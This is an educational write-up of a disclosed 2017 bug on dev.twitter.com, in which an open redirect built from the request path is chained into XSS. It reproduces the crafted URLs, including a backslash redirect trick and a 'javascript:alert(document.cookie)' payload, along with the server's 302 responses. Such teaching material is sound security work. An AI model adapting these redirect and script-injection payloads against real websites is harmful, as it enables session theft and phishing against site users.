XSS and open redirect on Twitter

On September 29th, 2017, the researcher Sergey Bobrov published a vulnerability affecting Twitter's developer site, dev.twitter.com. It is a clear instance of the pattern we reviewed earlier: an open redirect used as the delivery vehicle for an XSS payload.

Bobrov noticed that the following URL on dev.twitter.com produced a redirect built from the request path:

https://dev.twitter.com/https:/%5cblackfan.ru/

The application answered with a 302 whose Location header echoed the path (the `%5c` in the request decodes to a backslash):

HTTP/1.1 302 Found
connection: close
...
location: https:/\blackfan.ru

Browser URL parsers treat a backslash after the scheme the same way as a forward slash, so `https:/\blackfan.ru` is loaded as `https://blackfan.ru`: an attacker-controlled host. That alone is an open redirect.

To turn the redirect into XSS, he placed a javascript: URL in the path so that the application would echo it back into the redirect response:

https://dev.twitter.com//x:1/:///%01javascript:alert(document.cookie)/
The HTTP response generated by Twitter was:

HTTP/1.1 302 Found
connection: close
...
location: //x:1/://dev.twitter.com/javascript:alert(document.cookie)
...
<p>You should be redirected automatically to target URL: <a href="javascript:alert(document.cookie)">javascript:alert(document.cookie)</a>.  If not click the link.
  

Following the link in that fallback page executes alert(document.cookie) in the dev.twitter.com origin, which is the XSS.

This is an interesting bug because it chains two vulnerabilities. It is also interesting because by 2017 practically all browsers refused to follow a redirect whose Location header pointed at a javascript: URL, a control added precisely to stop redirect-based phishing and script injection. The open redirect gave Bobrov a way around that control: the payload is not only placed in the Location header but also echoed into the HTML body of the redirect page, where it becomes a clickable link served from dev.twitter.com, so the script runs in that origin once the link is followed.

If you want to read more about this bug, check out this report: https://hackerone.com/reports/260744.